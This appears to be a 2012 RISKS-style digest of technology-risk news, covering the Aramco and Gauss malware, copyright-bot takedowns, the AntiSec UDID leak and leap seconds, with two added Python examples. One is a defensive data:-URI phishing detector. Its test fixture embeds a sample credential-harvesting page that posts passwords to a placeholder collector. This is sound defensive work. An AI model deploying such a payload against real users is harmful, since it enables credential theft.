Excerpt from "2 more Yosemite visitors have hantavirus", http://www.usatoday.com/news/health/story/2012-08-30/yosemite-hantavirus-warnings/57435330/1 Meanwhile, the park sent warning e-mails and letters on Wednesday to another 1,000 people who stayed in tent cabins in Curry Village, after officials found that a computer glitch had stopped the notices from going out with the original 1,700 warnings on Monday. The warning says anyone with flu-like symptoms or respiratory problems should seek immediate medical attention.
A $2.4-billion replacement for the U.S. air-traffic control computers plagued by delays and cost overruns will be completed within the revised budget and 2014 deadline, said Michael Huerta, acting chief of the FAA. [ERAM - En-Route Automation Modernization] [Bloomberg, PGN-ed] (well maybe!!! djf) [Browse on the Subject line for the article. Dave's comment might relate to the fact that some of our readers may remember the eventual cancelation of an earlier en-route ATC modernization effort, after the expenditure of $4 billion. It's nice to know costs are coming down! PGN]
Bloomberg, 28 Aug 2012 http://www.bloomberg.com/news/2012-08-28/united-check-ins-slowed-as-airline-reservation-system-goes-down.html
First hacktivist-style assault to use malware? John Leyden, *The Register*, 29 August 2012 Analysis Saudi Aramco said that it had put its network back online on Saturday, 10 days after a malware attack floored 30,000 workstations at the oil giant. In a statement [1], Saudi Arabia's national oil firm said that it had "restored all its main internal network services" hit by a malware outbreak that struck on 15 August. The firm said its core business of oil production and exploration was not affected by the attack, which resulted in a decision to suspend Saudi Aramco's website for a period of a few days, presumably as a precaution. Corporate remote access services were also suspended as a result of the attack. Oil and production systems were run off "isolated network systems unaffected by the attack", which the firm has pledged to investigate. In the meantime, Saudi Aramco promised [2] to improve the security of its network to guard against fresh assaults. ... http://www.theregister.co.uk/2012/08/29/saudi_aramco_malware_attack_analysis/
Scott Bauer, Thousands fall victim to utility payment scam, Associated Press, 12 Jul 2012 As much as President Barack Obama wants your vote, he's not actually offering to pay your monthly bills. But thousands of Americans have been persuaded otherwise, falling victim to a fast-moving scam that claims to be part of an Obama administration program to help pay utility bills in the midst of a scorching summer. The scheme spread quickly across the nation in recent weeks with help from victims who unwittingly shared it on social media sites before realizing they had been conned out of personal information such as Social Security, credit card and checking account numbers. ... http://www.boston.com/business/news/2012/07/12/thousands-fall-victim-utility-payment-scam/CM2m794xalBFJq043Kei5O/story.html
Appeal for help to break open hidden scrambled payload John Leyden, *The Register*, 14 August 2012 Antivirus experts have called on cryptographers and other clever bods for help after admitting they are no closer to figuring out the main purpose of the newly discovered Gauss supervirus. While it's known that the complex malware features many information-stealing capabilities, with a specific focus on capturing website passwords, online banking account credentials and system configuration data from infected machines, the content of the virus's encrypted payload is still a mystery. Kaspersky Lab had tracked Gauss for weeks before announcing its discovery last week. Antivirus experts at the security biz and elsewhere have been burning the midnight oil in the days since, and although progress has been made - for example in analysing its architecture [1], unique modules and communication methods - the payload encryption is unbroken. Researchers reckon the hidden binary blob, when decrypted and executed, looks for a program specifically named using an extended character set, such as Arabic or Hebrew. What that program might be remains unclear as long as the encryption remains unbroken. The general consensus among security experts is that Gauss - like Flame, Duqu and Stuxnet before it - is a nation-state sponsored cyber-espionage toolkit, quite possibly built from the same components as Flame. ... http://www.theregister.co.uk/2012/08/14/gauss_mystery_payload/ [One of my colleagues suggests that unraveling the hidden payload would require breaking some serious crypto, and that someone successfully doing so might not be in a position to want to claim success. But RISKS awaits any further news on this topic. PGN]
[An early mention of this case stated: “Harvard University is investigating what it calls an `unprecedented' case of cheating. College officials say around 125 students may have shared answers and plagiarized on a [Introduction To Congress] final exam.'' Source: Curt Nickisch, NPR 31 Aug.] The exam in question was an open-book take-home exam from a professor reportedly inclined to give mostly high grades based in part on factors such as the number of citations! Perhaps many of the 125 students were citing the same sources from the Internet? Is that collusion or collation collision? We await details. PGN] Richard Perez-Pena, *The New York Times*, 31 Aug 2012 Harvard students suspected in a major cheating scandal said that many of the accusations are based on innocent - or at least tolerated - collaboration among students, and with help from graduate-student teachers who sometimes gave them answers to test questions. Students said they were tripped up by a course whose tests were confusing, whose grading was inconsistent, and for which the professor and teaching assistants gave contradictory signals about what was expected. They face the possibility of a one-year suspension from Harvard or revocation of their diplomas if they have already graduated, and some said that they will sue the university if any serious punishment is meted out. In years past, the course, Introduction to Congress, had a reputation as one of the easiest at Harvard College. Some of the 279 students who took it in the spring semester said that the teacher, Matthew B. Platt, an assistant professor of government, told them at the outset that he gave high grades and that neither attending his lectures nor the discussion sessions with graduate teaching fellows was mandatory. ... http://www.nytimes.com/2012/09/01/education/students-of-harvard-cheating-scandal-say-group-work-was-accepted.html
Simon Phipps and Ted Samson, Robots aren't smart enough to decide if video or song is used lawfully; instead of trying to improve content monitoring software, we should look to ditch it, *InfoWorld*, 5 Sep 2012 http://www.infoworld.com/t/drm/automated-drm-keeps-spoiling-the-show-the-dnc-mars-201688 opening text (one of the examples): Science-fiction fans from all over the world were avidly watching the live broadcast of the Hugo Awards last Sunday from Chicon 7, the World Science Fiction Convention in Chicago. This is a venerable event with much more longevity than you might imagine: Attendees were celebrating the event's 70th year. One of the award winners, British author Neil Gaiman, was recognized for a script for the cult BBC TV series "Doctor Who." Following the showing of a clip from the episode, Gaiman took the podium for the award ceremony to make his acceptance speech. Then, however, the broadcast was abruptly cut off. A robot at Ustream, presumably using data provided by the BBC, decided on the basis of that short clip that this was an illegal broadcast of "Doctor Who" and pulled the plug. Worse, it turned out that no one at the Hugo Awards or at Ustream was empowered to turn it back on again. Ustream has promised to upgrade its robot to understand fair use, but the proposal is both ridiculous—even judges struggle with fair use arguments—and dangerous.
"This occurred because our 3rd party automated infringement system, Vobile, detected content in the stream that it deemed to be copyrighted. Vobile is a system that rights holders upload their content for review on many video sites around the web. The video clips shown prior to Neil's speech automatically triggered the 3rd party system at the behest of the copyright holder." http://j.mp/RhrLMq (Ustream via NNSquad) Most of the folks commenting on their posting are not very happy. [In another NNS posting on this subject, Lauren Weinstein added, “A similar risk exists with Google's "Hangouts On Air" via Content ID. Solutions are not trivial.'' PGN] [Lee Rudolph noted Hugo and the Rampaging Robots. PGN] http://io9.com/5940036/how-copyright-enforcement-robots-killed-the-hugo-awards
http://j.mp/OQe20R (This message on Google+) http://j.mp/OQexrV (Slate, via NNSquad) "Either way, this amounts to something less than a copyright apocalypse. Michelle Obama's speech is still available on plenty of other YouTube channels, including here, here, and here. But on the heels of the Hugo Awards debacle, it's another reminder of the need for human vigilance against overzealous digital-rights-management algorithms. In a statement chalking up the glitch to "a technical error on YouTube," an Obama campaign official added, "We do not expect tonight's coverage will be affected." Copyright bots, the gauntlet has been thrown!" Irrespective of this particular case, this whole area (not just YouTube) of automated content flagging needs serious attention from a number of standpoints. Here's an example of what has happened to me (and many other people). I uploaded a video of mine that included a segment of old, definitely public domain material. Shortly thereafter, my entire vid was flagged by YouTube's Content ID. Why? It took some digging to figure out, but it turns out a Content ID partner had uploaded a video of their own that happened to include a section of the same public domain material I had used. This apparently made it look like my video was infringing, since Content ID assumed the section of my vid that matched their vid was in violation. Wrong! But Content ID partners get the assumption of being correct, and there's no way for an average user to assert that something is public domain a priori. I was able to get this reversed by careful explanation on the appropriate forms, but I wonder how many people would just throw up their arms and say, "To hell with it!" and not bother? This is not an easy situation to solve, but the explicit assumption that Content ID partners are correct and that takedowns or other actions are immediate—with a protest required to get blocks, etc. removed after the fact, strikes me as increasingly problematic. 
Lauren Weinstein (lauren@vortex.com): http://www.vortex.com/lauren Network Neutrality Squad: http://www.nnsquad.org +1 (818) 225-2800
"One million unique device identifiers (UDIDs) from iOS devices have been posted online by hacking group AntiSec, who claimed the UDIDs came from an FBI-owned laptop. The group published a file containing the UDIDs-as well as push notification tokens, device names, and more-on Monday evening, promising that there are plenty more entries where that came from. AntiSec claims the original file contained roughly 12 million UDID entries-some with very personal data attached, such as full names, cell numbers, and home addresses." http://j.mp/Rhq4yu (ars technica via NNSquad) [Key word right now is *alleged*. LW]
"The Federal Bureau of Investigation is refuting a statement made by members of AntiSec this weekend that they hacked the laptop of an FBI special agent and stole a file containing 12 million Apple device IDs and associated personal information." http://j.mp/PZtzNY (*Wired* via NNSquad)
Wrapping everything up in the same box makes hard tasks easy and big problems bigger, *InfoWorld*, 4 Sep 2012 http://www.infoworld.com/d/data-center/when-virtualization-becomes-your-worst-enemy-201398 [The IT version of putting all of one's eggs in one basket?]
Randall Stross, *The New York Times*, 1 Sep 2012 [PGN-ed] http://www.nytimes.com/2012/09/02/technology/gps-and-human-error-can-lead-drivers-astray-digital-domain.html?nl=todaysheadlines&emc=tha26_20120902 The turn-by-turn instructions of GPS-based navigation systems, ingeniously designed though they may be, can't always save us from ourselves. Consider the experience of a man from San Diego who flew to the East Coast and picked up a GPS-equipped rental car at the airport. After 20 minutes, he sensed he was headed in the wrong direction. Then he realized that he had unthinkingly entered his California address as his destination. "The navigation system had dutifully set a route back to his home in San Diego, 3,000 miles away," said Barry Brown, co-director of the Mobile Life Center, based in Stockholm, which does research on mobile communication. The incident happened to a friend of his. Mr. Brown is co-author of a recent paper titled "The Normal Natural Troubles of Driving With GPS." The paper illuminates a drawback of GPS technology: that it is designed for docile drivers whose navigational skills have atrophied. ... Randall Stross <stross@nytimes.com> is an author based in Silicon Valley and a professor of business at San Jose State University.
John Leyden, Windows? Who the hell uses that? *The Register*, 29 August 2012 Security researchers have discovered a potentially dangerous Linux and Mac OS X cross-platform trojan. Once installed on a compromised machine, Wirenet-1 opens a backdoor to a remote command server, and logs key presses to capture passwords and sensitive information typed by victims. The program also grabs passwords submitted to Opera, Firefox, Chrome and Chromium web browsers, and credentials stored by applications including e-mail client Thunderbird, web suite SeaMonkey, and chat app Pidgin. The malware then attempts to upload the gathered data to a server hosted in the Netherlands. ... http://www.theregister.co.uk/2012/08/29/linux_mac_trojan/
"Among a bevy of patents awarded to Apple this week was one that would enable or disable certain features of a phone depending on its location. It could be useful, but it also raises serious questions about who really owns your device." http://j.mp/PZNegI (NBC via NNSquad) A lot of ideas are patented but never used. Anyway, without reading the patent in detail, I'd note there are a variety of apps (that probably postdate the patent application) that do this already. One problem with any attempt to enforce such a regime is that you need everyone to have phones carrying the capability, and you have to be ready for the litigation exposure if (for example) an important call or message is blocked by such a system. It doesn't take much imagination to think of a bunch of other exposure examples as well.
http://www.boston.com/business/technology/2012/09/02/smartphone-apps-track-users-even-when-shut-down/IH5UM0d4FYU5Gf5GlFjWcL/story.html Some smartphone apps collect and transmit sensitive information stored on a phone, including location, contacts, and Web browsing histories, even when the apps are not being used by the phone's owner, according to two researchers at the Massachusetts Institute of Technology. "It seems like people are no longer in control of their own privacy," said Frances Zhang, a master's degree student in computer science at MIT. Zhang and fellow researcher Fuming Shih, a computer science doctoral candidate, found that some popular apps for phones running Google Inc.'s Android operating system are continually collecting information without informing the phone's owner. The popular game Angry Birds uses the phone's GPS and Wi-Fi wireless networking features to track the owner's location, even when he's not playing the game, for example. Another game, Bowman, collects information from the phone's Internet browser, including what websites the owner has been visiting. And WhatsApp, a popular text-messaging program, scans the user's address book when it is seemingly idle.
Paul Marks, *New Scientist*, 4 Sep 2012, via Dave Farber's IP http://www.newscientist.com/blogs/onepercent/2012/09/honeytrap-catches-copyright-co.html Anyone who has downloaded pirated music, video or ebooks using a BitTorrent client has probably had their IP address logged by copyright-enforcement authorities within 3 hours of doing so. So say computer scientists who placed a fake pirate server online - and very quickly found monitoring systems checking out who was taking what from the servers. The news comes from this week's SecureComm conference in Padua, Italy, where computer security researcher Tom Chothia and his colleagues at the University of Birmingham, UK, revealed they have discovered "massive monitoring" of BitTorrent download sites, such as the PirateBay, has been taking place for at least three years. BitTorrent is a data distribution protocol that splits an uploaded digital media file into many parts and shares it around a swarm of co-operating servers. Birmingham's fake server acted like a part of a file-sharing swarm and the connections made to it quickly revealed the presence of file-sharing monitors run by "copyright enforcement organisations, security companies and even government research labs". ...
John Leyden, Watch out for the tinyurl that isn't, *The Register*, 3 Sep 2012 A shortcoming in browsers including Firefox and Opera allows crooks to easily hide an entire malicious web page in a clickable link - ideal for fooling victims into handing over passwords and other sensitive info. Usually, so-called "phishing attacks" rely on tricking marks into visiting websites designed by criminals to masquerade as banks and online stores, thus snaffling punters' credentials and bank account details when they try to use the bogus pages. However this requires finding somewhere to host the counterfeit sites, which are often quickly taken down by hosting companies and the authorities or blocked by filters. Instead, the malicious web pages can be stored in data URIs - uniform resource identifiers, not to be confused with URLs - which stuff the web code into a handy string that when clicked on, instructs the browser to unpack the payload and present it as a page. It negates the need to find somewhere to secrete your malicious page, and once shortened using a service such as TinyURL, the URI can be reduced to a small URL perfect for passing around social networks, online chats and e-mail. Crooks would still need to set up a server to receive data from victims, however. ... http://www.theregister.co.uk/2012/09/03/phishing_without_hosts_peril/
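As an added example that is not part of the Register article or of the RISKS posting: the check a mail gateway or browser extension could apply to a link before rendering it, decoding a data: URI and flagging one whose payload is an HTML document carrying a credential form, which is the hosting-free phishing pattern the article describes. The sample links, including the collector address https://example.invalid/collect, are constructed for this example.

```python
"""Defensive link check for data: URIs (added example, not from the article).

Assumptions, labelled: the SAMPLE_LINKS below are constructed test inputs;
the collector address https://example.invalid/collect is a placeholder."""
import base64
import re
from urllib.parse import unquote

# data:[<mediatype>][;param]*,<payload>  (RFC 2397 shape; params may hold ;base64)
DATA_URI_RE = re.compile(
    r"^data:(?P<mime>[^;,]*)(?P<params>(;[^,]*)*),(?P<body>.*)$",
    re.DOTALL | re.IGNORECASE,
)


def decode_data_uri(uri):
    """Return (mime_type, decoded_text) for a data: URI, or None for any other URL."""
    m = DATA_URI_RE.match(uri.strip())
    if not m:
        return None
    mime = (m.group("mime") or "text/plain").lower()
    params = m.group("params").lower()
    body = m.group("body")
    if ";base64" in params:
        # Re-pad: shorteners and copy/paste frequently strip trailing '='.
        raw = base64.b64decode(body + "=" * (-len(body) % 4))
        text = raw.decode("utf-8", errors="replace")
    else:
        text = unquote(body)  # percent-encoded plain payload
    return mime, text


def classify_link(uri):
    """Classify a link for a filter policy:
    'not-data-uri'               ordinary scheme, nothing embedded
    'data-other'                 data: URI that is not an HTML document (e.g. image)
    'data-html'                  a whole page embedded in the link
    'data-html-credential-form'  embedded page with a form and a password field
    """
    decoded = decode_data_uri(uri)
    if decoded is None:
        return "not-data-uri"
    mime, text = decoded
    if mime != "text/html":
        return "data-other"
    lowered = text.lower().replace("'", '"')
    if "<form" in lowered and 'type="password"' in lowered:
        return "data-html-credential-form"
    return "data-html"


# Constructed sample inputs for the check above.
SAMPLE_LINKS = {
    "plain": "https://example.com/login",
    "image": "data:image/png;base64,iVBORw0KGgo=",
    "page": "data:text/html,<h1>Hello</h1>",
    "phish": "data:text/html;base64," + base64.b64encode(
        b'<html><form action="https://example.invalid/collect" method="post">'
        b'Account: <input name="user"> Password: <input type="password" name="pw">'
        b'<input type="submit"></form></html>'
    ).decode("ascii"),
}

if __name__ == "__main__":
    for label, link in SAMPLE_LINKS.items():
        print(f"{label:6s} -> {classify_link(link)}")
```

A shortened link hides the scheme until the shortener's redirect is followed, so a check like this has to run on the final expanded target rather than on the TinyURL-style link itself; the article's point is that once expanded there is no hosting site to take down, only the link to block.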
"This crossed my desk this morning, it is a long and detailed (and honest!) account by an insider of Google's efforts to increase code quality and product quality: http://mike-bland.com/2012/07/10/test-mercenaries.html " [This item is indeed long, but could be worth reading if you consider yourself a software engineer. PGN]
An MSN editorial had some insight: "...Is that my cell phone buzzing, or the seat? 2013 Cadillac XTS (c) GMCadillac has a good idea here. Instead of annoying the driver with flashing lights and buzzing sounds from various active safety systems, it sends all those warnings to his back and rear end. ... The touch-capacitive dash is another story. See those silver trim pieces that look like you should touch them? Don't. They're just finger guides. The actual sensors are above them, which is confusing and frustrating. They're also slow to respond to repeated inputs, like adjusting the cooled seat or the fan speed, unless you're deliberate with your pace and timing. Who wants to think about how you touch a control, especially while driving? Lincoln already came out with this system and it's no different. It's like tapping a plastic post and wondering if some magic will happen. You also feel kind of dumb getting it wrong, which tends to happen when you're paying attention to the road. This feature needs to die." http://editorial.autos.msn.com/blogs/autosblogpost.aspx?post=e29f4907-f964-45f5-818a-69a45340e1e4 Personally, I'm amazed that any UI designer for car controls would even think of making hand-eye coordination necessary for ancillary controls. I can control my old New Beetle radio and HVAC by touch, with very little learning. But my other cars with touch screens, any little bump and the wrong command gets invoked. And the voice control? I could go on and on, but in a nutshell, not there yet, adds frustration.
> And the people who don't like leap seconds or find them hard to deal
> with can switch to TAI, which already exists. Need a cheap local
> source of TAI? Get a GPS. And start setting up an NTP network of TAI
> timeservers—anyone doing this yet?

People are doing this. Several manufacturers of NTP servers allow an option where it can *violate the NTP spec* and provide GPS time or TAI instead of UTC. Alternatively, the IEEE 1588 spec for PTP is all about this notion of an operational system time scale based on TAI.

Alas, many international agencies responsible for this subject do not have scope of purview to make pronouncements on this subject, and the proceedings of various meetings do not show consensus. During the past decade the pronouncements from the providers of TAI at BIPM have done an about face. In 1999 the CCTF wrote saying yes, use TAI instead of UTC:

  The CCTF recommends, therefore, that in conformity with this ITU Recommendation developers of future satellite navigation systems and electronic communication systems should link their time scales to TAI as the only alternative to UTC and that, insofar as it is feasible, existing systems take steps to align their time scales with TAI.
  http://ursiweb.intec.ugent.be/A_97-99.htm

But in 2007 the CCTF wrote quite the opposite, saying no, do not use TAI instead of UTC:

  TAI is the uniform time scale underlying UTC, and that it should not be considered as an alternative time reference.
  http://www.bipm.org/cc/CCTF/Allowed/18/CCTF_09-27_note_on_UTC-ITU-R.pdf

TAI also does not serve POSIX, which specifies that the time_t is based on a trivial relationship to the face-value of UTC and that all days must have 86400 seconds. Unfortunately for POSIX the entire point of the UTC used in radio broadcast time signals since 1972 is that the second is not related to the day. From a system engineering standpoint it makes sense to use TAI, but its providers do not clearly agree.
Furthermore, it is not possible to use TAI in an operational system because its value is not available until the next month. Using GPS system time is an available good choice from an engineering standpoint, but GPS does not have international standard status required by some contractual specifications. The previous meeting on the future of UTC re-visited many of these subjects. The final paper at that meeting gave a worked example of using leap-free uniform atomic time (GPS or TAI) for POSIX while still retaining the notion of UTC day defined by earth rotation. Slides and preprints of the 400 pages proceedings are available at http://www.cacr.caltech.edu/futureofutc/2011/index.cfm

Steve Allen, UCO/Lick Observatory--ISB, 1156 High Street, Santa Cruz, CA 95064 http://www.ucolick.org/~sla/ +1 831 459 3046 <sla@ucolick.org>
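As an added example that is not part of Steve Allen's posting or of the proceedings it cites: the POSIX rule that time_t follows the UTC face value with every day 86400 seconds long, shown beside what it takes to recover a uniform TAI or GPS count from it. The code assumes a hand-copied subset of the published TAI-UTC history (33 s from 2006, 34 s from 2009, 35 s from 1 July 2012) and the fixed design offset TAI - GPS = 19 s; both are stated as assumptions in the comments.

```python
"""POSIX time_t versus TAI/GPS (added example, not from the posting).

Assumptions, labelled: LEAP_TABLE is a hand-copied subset of the IERS
TAI-UTC history covering 2006 onward; TAI_MINUS_GPS = 19 is the constant
GPS design offset. Neither is derivable from a time_t value itself."""
from datetime import datetime, timezone

# (UTC instant from which the offset applies, TAI - UTC in seconds)
LEAP_TABLE = [
    (datetime(2006, 1, 1, tzinfo=timezone.utc), 33),
    (datetime(2009, 1, 1, tzinfo=timezone.utc), 34),
    (datetime(2012, 7, 1, tzinfo=timezone.utc), 35),  # leap second of 2012-06-30
]
TAI_MINUS_GPS = 19  # GPS system time runs a constant 19 s behind TAI


def posix_from_utc(year, month, day, hour, minute, second):
    """POSIX time_t from a UTC face value: pure calendar arithmetic with
    86400-second days, so a leap second (ss = 60) has no representation."""
    if second > 59:
        raise ValueError("POSIX time_t cannot represent a leap second (ss=60)")
    return int(datetime(year, month, day, hour, minute, second,
                        tzinfo=timezone.utc).timestamp())


def tai_minus_utc(ts):
    """TAI - UTC in force at POSIX time ts, looked up in the leap table."""
    when = datetime.fromtimestamp(ts, tz=timezone.utc)
    offset = None
    for start, delta in LEAP_TABLE:
        if when >= start:
            offset = delta
    if offset is None:
        raise ValueError("timestamp predates the leap-second table")
    return offset


def posix_to_tai_seconds(ts):
    """Uniform TAI count with the same 1970 epoch label as time_t."""
    return ts + tai_minus_utc(ts)


def posix_to_gps_seconds(ts):
    """Uniform GPS count, same epoch label; GPS = TAI - 19 s."""
    return posix_to_tai_seconds(ts) - TAI_MINUS_GPS


def elapsed_seconds(ts_a, ts_b):
    """SI seconds actually elapsed between two POSIX instants, recovered from
    the uniform scale; plain time_t subtraction drops any leap second between them."""
    return posix_to_tai_seconds(ts_b) - posix_to_tai_seconds(ts_a)


if __name__ == "__main__":
    before = posix_from_utc(2012, 6, 30, 23, 59, 59)
    after = posix_from_utc(2012, 7, 1, 0, 0, 0)
    print("time_t difference:", after - before)        # POSIX sees 1 second
    print("TAI difference:   ", elapsed_seconds(before, after))  # 2 seconds passed
```

The two printed differences make the posting's point concrete: across the 2012-06-30 leap second the POSIX count advances by one while two SI seconds elapse, and turning time_t into TAI or GPS time needs an externally supplied table that, as the posting notes, only becomes definitive after the fact.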